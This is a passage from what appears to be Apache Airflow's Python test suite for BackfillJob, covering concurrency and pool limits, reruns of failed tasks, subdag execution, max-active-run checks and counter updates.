start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
job.run()
assert len(executor.history) > 0
task_concurrency_limit_reached_at_least_once = False
num_running_task_instances = 0
for running_task_instances in executor.history:
assert len(running_task_instances) <= max_active_tis_per_dag
num_running_task_instances += len(running_task_instances)
if len(running_task_instances) == max_active_tis_per_dag:
task_concurrency_limit_reached_at_least_once = True
assert 8 == num_running_task_instances
assert task_concurrency_limit_reached_at_least_once
times_dag_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
DagConcurrencyLimitReached,
)
times_pool_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
NoAvailablePoolSlot,
)
times_task_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
TaskConcurrencyLimitReached,
)
assert 0 == times_pool_limit_reached_in_debug
assert 0 == times_dag_concurrency_limit_reached_in_debug
assert times_task_concurrency_limit_reached_in_debug > 0
@patch('airflow.jobs.backfill_job.BackfillJob.log')
def test_backfill_respect_dag_concurrency_limit(self, mock_log, dag_maker):
dag = self._get_dummy_dag(dag_maker, dag_id='test_backfill_respect_concurrency_limit')
dag_maker.create_dagrun(state=None)
dag.max_active_tasks = 2
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
job.run()
assert len(executor.history) > 0
concurrency_limit_reached_at_least_once = False
num_running_task_instances = 0
for running_task_instances in executor.history:
assert len(running_task_instances) <= dag.max_active_tasks
num_running_task_instances += len(running_task_instances)
if len(running_task_instances) == dag.max_active_tasks:
concurrency_limit_reached_at_least_once = True
assert 8 == num_running_task_instances
assert concurrency_limit_reached_at_least_once
times_dag_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
DagConcurrencyLimitReached,
)
times_pool_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
NoAvailablePoolSlot,
)
times_task_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
TaskConcurrencyLimitReached,
)
assert 0 == times_pool_limit_reached_in_debug
assert 0 == times_task_concurrency_limit_reached_in_debug
assert times_dag_concurrency_limit_reached_in_debug > 0
@patch('airflow.jobs.backfill_job.BackfillJob.log')
def test_backfill_respect_default_pool_limit(self, mock_log, dag_maker):
default_pool_slots = 2
set_default_pool_slots(default_pool_slots)
dag = self._get_dummy_dag(dag_maker, dag_id='test_backfill_with_no_pool_limit')
dag_maker.create_dagrun(state=None)
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
job.run()
assert len(executor.history) > 0
default_pool_task_slot_count_reached_at_least_once = False
num_running_task_instances = 0
        # If no pool is specified, the number of tasks running in
        # parallel per backfill should never exceed the number of
        # default_pool slots at any point in time.
for running_task_instances in executor.history:
assert len(running_task_instances) <= default_pool_slots
num_running_task_instances += len(running_task_instances)
if len(running_task_instances) == default_pool_slots:
default_pool_task_slot_count_reached_at_least_once = True
assert 8 == num_running_task_instances
assert default_pool_task_slot_count_reached_at_least_once
times_dag_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
DagConcurrencyLimitReached,
)
times_pool_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
NoAvailablePoolSlot,
)
times_task_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
TaskConcurrencyLimitReached,
)
assert 0 == times_dag_concurrency_limit_reached_in_debug
assert 0 == times_task_concurrency_limit_reached_in_debug
assert times_pool_limit_reached_in_debug > 0
def test_backfill_pool_not_found(self, dag_maker):
dag = self._get_dummy_dag(
dag_maker,
dag_id='test_backfill_pool_not_found',
pool='king_pool',
)
dag_maker.create_dagrun(state=None)
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
try:
job.run()
except AirflowException:
return
@patch('airflow.jobs.backfill_job.BackfillJob.log')
def test_backfill_respect_pool_limit(self, mock_log, dag_maker):
session = settings.Session()
slots = 2
pool = Pool(
pool='pool_with_two_slots',
slots=slots,
)
session.add(pool)
session.commit()
dag = self._get_dummy_dag(
dag_maker,
dag_id='test_backfill_respect_pool_limit',
pool=pool.pool,
)
dag_maker.create_dagrun(state=None)
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
job.run()
assert len(executor.history) > 0
pool_was_full_at_least_once = False
num_running_task_instances = 0
for running_task_instances in executor.history:
assert len(running_task_instances) <= slots
num_running_task_instances += len(running_task_instances)
if len(running_task_instances) == slots:
pool_was_full_at_least_once = True
assert 8 == num_running_task_instances
assert pool_was_full_at_least_once
times_dag_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
DagConcurrencyLimitReached,
)
times_pool_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
NoAvailablePoolSlot,
)
times_task_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
TaskConcurrencyLimitReached,
)
assert 0 == times_task_concurrency_limit_reached_in_debug
assert 0 == times_dag_concurrency_limit_reached_in_debug
assert times_pool_limit_reached_in_debug > 0
def test_backfill_run_rescheduled(self, dag_maker):
dag = self._get_dummy_dag(
dag_maker, dag_id="test_backfill_run_rescheduled", task_id="test_backfill_run_rescheduled_task-1"
)
dag_maker.create_dagrun(state=None)
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_run_rescheduled_task-1'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UP_FOR_RESCHEDULE)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True,
)
job.run()
ti = TI(task=dag.get_task('test_backfill_run_rescheduled_task-1'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
assert ti.state == State.SUCCESS
def test_backfill_override_conf(self, dag_maker):
dag = self._get_dummy_dag(
dag_maker, dag_id="test_backfill_override_conf", task_id="test_backfill_override_conf-1"
)
dr = dag_maker.create_dagrun(
state=None,
start_date=DEFAULT_DATE,
)
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
conf={"a": 1},
)
with patch.object(
job,
"_task_instances_for_dag_run",
wraps=job._task_instances_for_dag_run,
) as wrapped_task_instances_for_dag_run:
job.run()
dr = wrapped_task_instances_for_dag_run.call_args_list[0][0][0]
assert dr.conf == {"a": 1}
def test_backfill_skip_active_scheduled_dagrun(self, dag_maker, caplog):
dag = self._get_dummy_dag(
dag_maker,
dag_id="test_backfill_skip_active_scheduled_dagrun",
task_id="test_backfill_skip_active_scheduled_dagrun-1",
)
dag_maker.create_dagrun(
run_type=DagRunType.SCHEDULED,
state=State.RUNNING,
)
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
error_log_records = [record for record in caplog.records if record.levelname == "ERROR"]
assert "Backfill cannot be created for DagRun" in error_log_records[0].msg
ti = TI(
task=dag.get_task('test_backfill_skip_active_scheduled_dagrun-1'), execution_date=DEFAULT_DATE
)
ti.refresh_from_db()
# since DAG backfill is skipped, task state should be none
assert ti.state == State.NONE
def test_backfill_rerun_failed_tasks(self, dag_maker):
dag = self._get_dummy_dag(
dag_maker, dag_id="test_backfill_rerun_failed", task_id="test_backfill_rerun_failed_task-1"
)
dag_maker.create_dagrun(state=None)
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True,
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
assert ti.state == State.SUCCESS
def test_backfill_rerun_upstream_failed_tasks(self, dag_maker):
with dag_maker(dag_id='test_backfill_rerun_upstream_failed', schedule_interval='@daily') as dag:
op1 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-1')
op2 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-2')
op1.set_upstream(op2)
dag_maker.create_dagrun(state=None)
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UPSTREAM_FAILED)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True,
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
assert ti.state == State.SUCCESS
def test_backfill_rerun_failed_tasks_without_flag(self, dag_maker):
dag = self._get_dummy_dag(
dag_maker, dag_id='test_backfill_rerun_failed', task_id='test_backfill_rerun_failed_task-1'
)
dag_maker.create_dagrun(state=None)
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=False,
)
with pytest.raises(AirflowException):
job.run()
def test_backfill_retry_intermittent_failed_task(self, dag_maker):
with dag_maker(
dag_id='test_intermittent_failure_job',
schedule_interval="@daily",
default_args={
'retries': 2,
'retry_delay': datetime.timedelta(seconds=0),
},
) as dag:
task1 = DummyOperator(task_id="task1")
dag_maker.create_dagrun(state=None)
executor = MockExecutor(parallelism=16)
executor.mock_task_results[
TaskInstanceKey(dag.dag_id, task1.task_id, DEFAULT_DATE, try_number=1)
] = State.UP_FOR_RETRY
executor.mock_task_results[
TaskInstanceKey(dag.dag_id, task1.task_id, DEFAULT_DATE, try_number=2)
] = State.UP_FOR_RETRY
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
def test_backfill_retry_always_failed_task(self, dag_maker):
with dag_maker(
dag_id='test_always_failure_job',
schedule_interval="@daily",
default_args={
'retries': 1,
'retry_delay': datetime.timedelta(seconds=0),
},
) as dag:
task1 = DummyOperator(task_id="task1")
dr = dag_maker.create_dagrun(state=None)
executor = MockExecutor(parallelism=16)
executor.mock_task_results[
TaskInstanceKey(dag.dag_id, task1.task_id, dr.run_id, try_number=1)
] = State.UP_FOR_RETRY
executor.mock_task_fail(dag.dag_id, task1.task_id, dr.run_id, try_number=2)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
)
with pytest.raises(BackfillUnfinished):
job.run()
def test_backfill_ordered_concurrent_execute(self, dag_maker):
with dag_maker(
dag_id='test_backfill_ordered_concurrent_execute',
schedule_interval="@daily",
) as dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
runid0 = f'backfill__{DEFAULT_DATE.isoformat()}'
dag_maker.create_dagrun(run_id=runid0)
executor = MockExecutor(parallelism=16)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
runid1 = f'backfill__{(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()}'
runid2 = f'backfill__{(DEFAULT_DATE + datetime.timedelta(days=2)).isoformat()}'
# test executor history keeps a list
history = executor.history
assert [sorted(item[-1].key[1:3] for item in batch) for batch in history] == [
[
('leave1', runid0),
('leave1', runid1),
('leave1', runid2),
('leave2', runid0),
('leave2', runid1),
('leave2', runid2),
],
[('upstream_level_1', runid0), ('upstream_level_1', runid1), ('upstream_level_1', runid2)],
[('upstream_level_2', runid0), ('upstream_level_2', runid1), ('upstream_level_2', runid2)],
[('upstream_level_3', runid0), ('upstream_level_3', runid1), ('upstream_level_3', runid2)],
]
def test_backfill_pooled_tasks(self):
"""
Test that queued tasks are executed by BackfillJob
"""
session = settings.Session()
pool = Pool(pool='test_backfill_pooled_task_pool', slots=1)
session.add(pool)
session.commit()
session.close()
dag = self.dagbag.get_dag('test_backfill_pooled_task_dag')
dag.clear()
executor = MockExecutor(do_update=True)
job = BackfillJob(dag=dag, start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, executor=executor)
# run with timeout because this creates an infinite loop if not
# caught
try:
with timeout(seconds=5):
job.run()
except AirflowTaskTimeout:
pass
ti = TI(task=dag.get_task('test_backfill_pooled_task'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
assert ti.state == State.SUCCESS
@pytest.mark.parametrize("ignore_depends_on_past", [True, False])
def test_backfill_depends_on_past_works_independently_on_ignore_depends_on_past(
self, ignore_depends_on_past
):
dag = self.dagbag.get_dag('test_depends_on_past')
dag.clear()
run_date = DEFAULT_DATE + datetime.timedelta(days=5)
BackfillJob(
dag=dag,
start_date=run_date,
end_date=run_date,
executor=MockExecutor(),
ignore_first_depends_on_past=ignore_depends_on_past,
).run()
# ti should have succeeded
ti = TI(dag.tasks[0], run_date)
ti.refresh_from_db()
assert ti.state == State.SUCCESS
def test_backfill_depends_on_past_backwards(self):
"""
Test that CLI respects -B argument and raises on interaction with depends_on_past
"""
dag_id = 'test_depends_on_past'
start_date = DEFAULT_DATE + datetime.timedelta(days=1)
end_date = start_date + datetime.timedelta(days=1)
kwargs = dict(
start_date=start_date,
end_date=end_date,
)
dag = self.dagbag.get_dag(dag_id)
dag.clear()
executor = MockExecutor()
job = BackfillJob(dag=dag, executor=executor, ignore_first_depends_on_past=True, **kwargs)
job.run()
ti = TI(dag.get_task('test_dop_task'), end_date)
ti.refresh_from_db()
# runs fine forwards
assert ti.state == State.SUCCESS
# raises backwards
expected_msg = 'You cannot backfill backwards because one or more tasks depend_on_past: test_dop_task'
with pytest.raises(AirflowException, match=expected_msg):
executor = MockExecutor()
job = BackfillJob(dag=dag, executor=executor, run_backwards=True, **kwargs)
job.run()
def test_cli_receives_delay_arg(self):
"""
Tests that the --delay argument is passed correctly to the BackfillJob
"""
dag_id = 'example_bash_operator'
run_date = DEFAULT_DATE
args = [
'dags',
'backfill',
dag_id,
'-s',
run_date.isoformat(),
'--delay-on-limit',
'0.5',
]
parsed_args = self.parser.parse_args(args)
assert 0.5 == parsed_args.delay_on_limit
def _get_dag_test_max_active_limits(
self, dag_maker_fixture, dag_id='test_dag', max_active_runs=1, **kwargs
):
with dag_maker_fixture(
dag_id=dag_id,
schedule_interval="@hourly",
max_active_runs=max_active_runs,
**kwargs,
) as dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op1 >> op2 >> op3
op4 >> op3
return dag
def test_backfill_max_limit_check_within_limit(self, dag_maker):
dag = self._get_dag_test_max_active_limits(
dag_maker, dag_id='test_backfill_max_limit_check_within_limit', max_active_runs=16
)
dag_maker.create_dagrun(state=None)
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
executor = MockExecutor()
job = BackfillJob(
dag=dag, start_date=start_date, end_date=end_date, executor=executor, donot_pickle=True
)
job.run()
dagruns = DagRun.find(dag_id=dag.dag_id)
assert 2 == len(dagruns)
assert all(run.state == State.SUCCESS for run in dagruns)
def test_backfill_max_limit_check(self, dag_maker):
dag_id = 'test_backfill_max_limit_check'
run_id = 'test_dag_run'
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
dag_run_created_cond = threading.Condition()
def run_backfill(cond):
cond.acquire()
            # this session object is different from the one in the main thread
with create_session() as thread_session:
try:
dag = self._get_dag_test_max_active_limits(
dag_maker,
dag_id=dag_id,
)
dag_maker.create_dagrun(
state=None,
# Existing dagrun that is not within the backfill range
run_id=run_id,
execution_date=DEFAULT_DATE + datetime.timedelta(hours=1),
)
thread_session.commit()
cond.notify()
finally:
cond.release()
thread_session.close()
executor = MockExecutor()
job = BackfillJob(
dag=dag, start_date=start_date, end_date=end_date, executor=executor, donot_pickle=True
)
job.run()
backfill_job_thread = threading.Thread(
target=run_backfill, name="run_backfill", args=(dag_run_created_cond,)
)
dag_run_created_cond.acquire()
with create_session() as session:
backfill_job_thread.start()
try:
# at this point backfill can't run since the max_active_runs has been
# reached, so it is waiting
dag_run_created_cond.wait(timeout=1.5)
dagruns = DagRun.find(dag_id=dag_id)
assert 1 == len(dagruns)
dr = dagruns[0]
assert dr.run_id == run_id
# allow the backfill to execute
# by setting the existing dag run to SUCCESS,
# backfill will execute dag runs 1 by 1
dr.set_state(State.SUCCESS)
session.merge(dr)
session.commit()
backfill_job_thread.join()
dagruns = DagRun.find(dag_id=dag_id)
assert 3 == len(dagruns) # 2 from backfill + 1 existing
assert dagruns[-1].run_id == dr.run_id
finally:
dag_run_created_cond.release()
def test_backfill_max_limit_check_no_count_existing(self, dag_maker):
start_date = DEFAULT_DATE
end_date = DEFAULT_DATE
# Existing dagrun that is within the backfill range
dag = self._get_dag_test_max_active_limits(
dag_maker, dag_id='test_backfill_max_limit_check_no_count_existing'
)
dag_maker.create_dagrun(state=None)
executor = MockExecutor()
job = BackfillJob(
dag=dag, start_date=start_date, end_date=end_date, executor=executor, donot_pickle=True
)
job.run()
        # BackfillJob will run since the existing DagRun does not count toward
        # the max active limit, as it is within the backfill date range.
dagruns = DagRun.find(dag_id=dag.dag_id)
# will only be able to run 1 (the existing one) since there's just
# one dag run slot left given the max_active_runs limit
assert 1 == len(dagruns)
assert State.SUCCESS == dagruns[0].state
def test_backfill_max_limit_check_complete_loop(self, dag_maker):
dag = self._get_dag_test_max_active_limits(
dag_maker, dag_id='test_backfill_max_limit_check_complete_loop'
)
dag_maker.create_dagrun(state=None)
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
        # With max_active_runs limited to 1, the backfill has to process the
        # dag runs one at a time.
success_expected = 2
executor = MockExecutor()
job = BackfillJob(
dag=dag, start_date=start_date, end_date=end_date, executor=executor, donot_pickle=True
)
job.run()
success_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.SUCCESS))
running_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.RUNNING))
assert success_expected == success_dagruns
assert 0 == running_dagruns # no dag_runs in running state are left
def test_sub_set_subdag(self, dag_maker):
with dag_maker(
'test_sub_set_subdag',
) as dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dr = dag_maker.create_dagrun(state=None)
executor = MockExecutor()
sub_dag = dag.partial_subset(
task_ids_or_regex="leave*", include_downstream=False, include_upstream=False
)
job = BackfillJob(dag=sub_dag, start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, executor=executor)
job.run()
for ti in dr.get_task_instances():
if ti.task_id == 'leave1' or ti.task_id == 'leave2':
assert State.SUCCESS == ti.state
else:
assert State.NONE == ti.state
def test_backfill_fill_blanks(self, dag_maker):
with dag_maker(
'test_backfill_fill_blanks',
) as dag:
op1 = DummyOperator(task_id='op1')
op2 = DummyOperator(task_id='op2')
op3 = DummyOperator(task_id='op3')
op4 = DummyOperator(task_id='op4')
op5 = DummyOperator(task_id='op5')
op6 = DummyOperator(task_id='op6')
dr = dag_maker.create_dagrun(state=None)
executor = MockExecutor()
session = settings.Session()
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id == op1.task_id:
ti.state = State.UP_FOR_RETRY
ti.end_date = DEFAULT_DATE
elif ti.task_id == op2.task_id:
ti.state = State.FAILED
elif ti.task_id == op3.task_id:
ti.state = State.SKIPPED
elif ti.task_id == op4.task_id:
ti.state = State.SCHEDULED
elif ti.task_id == op5.task_id:
ti.state = State.UPSTREAM_FAILED
# op6 = None
session.merge(ti)
session.commit()
session.close()
job = BackfillJob(dag=dag, start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, executor=executor)
with pytest.raises(AirflowException, match='Some task instances failed'):
job.run()
dr.refresh_from_db()
assert dr.state == State.FAILED
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id in (op1.task_id, op4.task_id, op6.task_id):
assert ti.state == State.SUCCESS
elif ti.task_id == op2.task_id:
assert ti.state == State.FAILED
elif ti.task_id == op3.task_id:
assert ti.state == State.SKIPPED
elif ti.task_id == op5.task_id:
assert ti.state == State.UPSTREAM_FAILED
def test_backfill_execute_subdag(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.timetable = cron_timetable('@daily')
start_date = timezone.utcnow()
executor = MockExecutor()
job = BackfillJob(
dag=subdag, start_date=start_date, end_date=start_date, executor=executor, donot_pickle=True
)
job.run()
subdag_op_task.pre_execute(context={'execution_date': start_date})
subdag_op_task.execute(context={'execution_date': start_date})
subdag_op_task.post_execute(context={'execution_date': start_date})
history = executor.history
subdag_history = history[0]
# check that all 5 task instances of the subdag 'section-1' were executed
assert 5 == len(subdag_history)
for sdh in subdag_history:
ti = sdh[3]
assert 'section-1-task-' in ti.task_id
with create_session() as session:
successful_subdag_runs = (
session.query(DagRun)
.filter(DagRun.dag_id == subdag.dag_id)
.filter(DagRun.execution_date == start_date)
.filter(DagRun.state == State.SUCCESS)
.count()
)
assert 1 == successful_subdag_runs
subdag.clear()
dag.clear()
def test_subdag_clear_parentdag_downstream_clear(self):
dag = self.dagbag.get_dag('clear_subdag_test_dag')
subdag_op_task = dag.get_task('daily_job')
subdag = subdag_op_task.subdag
executor = MockExecutor()
job = BackfillJob(
dag=dag, start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, executor=executor, donot_pickle=True
)
with timeout(seconds=30):
job.run()
ti_subdag = TI(task=dag.get_task('daily_job'), execution_date=DEFAULT_DATE)
ti_subdag.refresh_from_db()
assert ti_subdag.state == State.SUCCESS
ti_irrelevant = TI(task=dag.get_task('daily_job_irrelevant'), execution_date=DEFAULT_DATE)
ti_irrelevant.refresh_from_db()
assert ti_irrelevant.state == State.SUCCESS
ti_downstream = TI(task=dag.get_task('daily_job_downstream'), execution_date=DEFAULT_DATE)
ti_downstream.refresh_from_db()
assert ti_downstream.state == State.SUCCESS
sdag = subdag.partial_subset(
task_ids_or_regex='daily_job_subdag_task', include_downstream=True, include_upstream=False
)
sdag.clear(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, include_parentdag=True)
ti_subdag.refresh_from_db()
assert State.NONE == ti_subdag.state
ti_irrelevant.refresh_from_db()
assert State.SUCCESS == ti_irrelevant.state
ti_downstream.refresh_from_db()
assert State.NONE == ti_downstream.state
subdag.clear()
dag.clear()
def test_backfill_execute_subdag_with_removed_task(self):
"""
Ensure that subdag operators execute properly in the case where
an associated task of the subdag has been removed from the dag
definition, but has instances in the database from previous runs.
"""
dag = self.dagbag.get_dag('example_subdag_operator')
subdag = dag.get_task('section-1').subdag
session = settings.Session()
executor = MockExecutor()
job = BackfillJob(
dag=subdag, start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, executor=executor, donot_pickle=True
)
dr = DagRun(
dag_id=subdag.dag_id, execution_date=DEFAULT_DATE, run_id="test", run_type=DagRunType.BACKFILL_JOB
)
session.add(dr)
removed_task_ti = TI(
task=DummyOperator(task_id='removed_task'), run_id=dr.run_id, state=State.REMOVED
)
removed_task_ti.dag_id = subdag.dag_id
dr.task_instances.append(removed_task_ti)
session.commit()
with timeout(seconds=30):
job.run()
for task in subdag.tasks:
instance = (
session.query(TI)
.filter(
TI.dag_id == subdag.dag_id, TI.task_id == task.task_id, TI.execution_date == DEFAULT_DATE
)
.first()
)
assert instance is not None
assert instance.state == State.SUCCESS
removed_task_ti.refresh_from_db()
assert removed_task_ti.state == State.REMOVED
subdag.clear()
dag.clear()
def test_update_counters(self, dag_maker, session):
with dag_maker(dag_id='test_manage_executor_state', start_date=DEFAULT_DATE, session=session) as dag:
task1 = DummyOperator(task_id='dummy', owner='airflow')
dr = dag_maker.create_dagrun(state=None)
job = BackfillJob(dag=dag)
ti = TI(task1, dr.execution_date)
ti.refresh_from_db()
ti_status = BackfillJob._DagRunTaskStatus()
# test for success
ti.set_state(State.SUCCESS, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status, session=session)
assert len(ti_status.running) == 0
assert len(ti_status.succeeded) == 1
assert len(ti_status.skipped) == 0
assert len(ti_status.failed) == 0
assert len(ti_status.to_run) == 0
ti_status.succeeded.clear()
# test for skipped
ti.set_state(State.SKIPPED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status, session=session)
assert len(ti_status.running) == 0
assert len(ti_status.succeeded) == 0
assert len(ti_status.skipped) == 1
assert len(ti_status.failed) == 0
assert len(ti_status.to_run) == 0
ti_status.skipped.clear()
# test for failed
ti.set_state(State.FAILED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status, session=session)
assert len(ti_status.running) == 0
assert len(ti_status.succeeded) == 0
assert len(ti_status.skipped) == 0
assert len(ti_status.failed) == 1
assert len(ti_status.to_run) == 0
ti_status.failed.clear()
# test for retry
ti.set_state(State.UP_FOR_RETRY, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status, session=session)
assert len(ti_status.running) == 0
assert len(ti_status.succeeded) == 0
assert len(ti_status.skipped) == 0
assert len(ti_status.failed) == 0
assert len(ti_status.to_run) == 1
ti_status.to_run.clear()
# test for reschedule
        # For the up-for-reschedule state, verify that the reduced key is not
        # used, by bumping try_number.
ti._try_number = 2
ti.set_state(State.UP_FOR_RESCHEDULE, session)
assert ti.try_number == 3 # see ti.try_number property in taskinstance module
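        # Context note (added for clarity, not in the original test): ti.key
        # includes the try number, and its "reduced" form lowers that number
        # so a running task instance can still be matched after its try number
        # was bumped; the try_number assertions here and below exercise both
        # sides of that behaviour.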
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status, session=session)
assert len(ti_status.running) == 0
assert len(ti_status.succeeded) == 0
assert len(ti_status.skipped) == 0
assert len(ti_status.failed) == 0
assert len(ti_status.to_run) == 1
ti_status.to_run.clear()
# test for none
ti.set_state(State.NONE, session)
# Setting ti._try_number = 0 brings us to ti.try_number==1
# so that the reduced_key access will work fine
ti._try_number = 0
assert ti.try_number == 1 # see ti.try_number property in taskinstance module
session.merge(ti)
session.commit()
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status, session=session)
assert len(ti_status.running) == 0
assert len(ti_status.succeeded) == 0
assert len(ti_status.skipped) == 0
assert len(ti_status.failed) == 0
assert len(ti_status.to_run) == 1
ti_status.to_run.clear()
session.close()
def test_dag_dagrun_infos_between(self, dag_maker):
with dag_maker(
dag_id='dagrun_infos_between', start_date=DEFAULT_DATE, schedule_interval="@hourly"
) as test_dag:
DummyOperator(
task_id='dummy',
owner='airflow',
)
assert [DEFAULT_DATE] == [
info.logical_date
for info in test_dag.iter_dagrun_infos_between(
earliest=DEFAULT_DATE,
latest=DEFAULT_DATE,
)
]
assert [
DEFAULT_DATE - datetime.timedelta(hours=3),
DEFAULT_DATE - datetime.timedelta(hours=2),
DEFAULT_DATE - datetime.timedelta(hours=1),
DEFAULT_DATE,
] == [
info.logical_date
for info in test_dag.iter_dagrun_infos_between(
earliest=DEFAULT_DATE - datetime.timedelta(hours=3),
latest=DEFAULT_DATE,
)
]
def test_backfill_run_backwards(self):
dag = self.dagbag.get_dag("test_start_date_scheduling")
dag.clear()
executor = MockExecutor(parallelism=16)
job = BackfillJob(
executor=executor,
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
run_backwards=True,
)
job.run()
session = settings.Session()
tis = (
session.query(TI)
.join(TI.dag_run)
            .filter(TI.dag_id == 'test_start_date_scheduling', TI.task_id == 'dummy')
.order_by(DagRun.execution_date)
.all()
)
queued_times = [ti.queued_dttm for ti in tis]
assert queued_times == sorted(queued_times, reverse=True)
assert all(ti.state == State.SUCCESS for ti in tis)
dag.clear()
session.close()
def test_reset_orphaned_tasks_with_orphans(self, dag_maker):
"""Create dagruns and ensure only ones with correct states are reset."""
prefix = 'backfill_job_test_test_reset_orphaned_tasks'
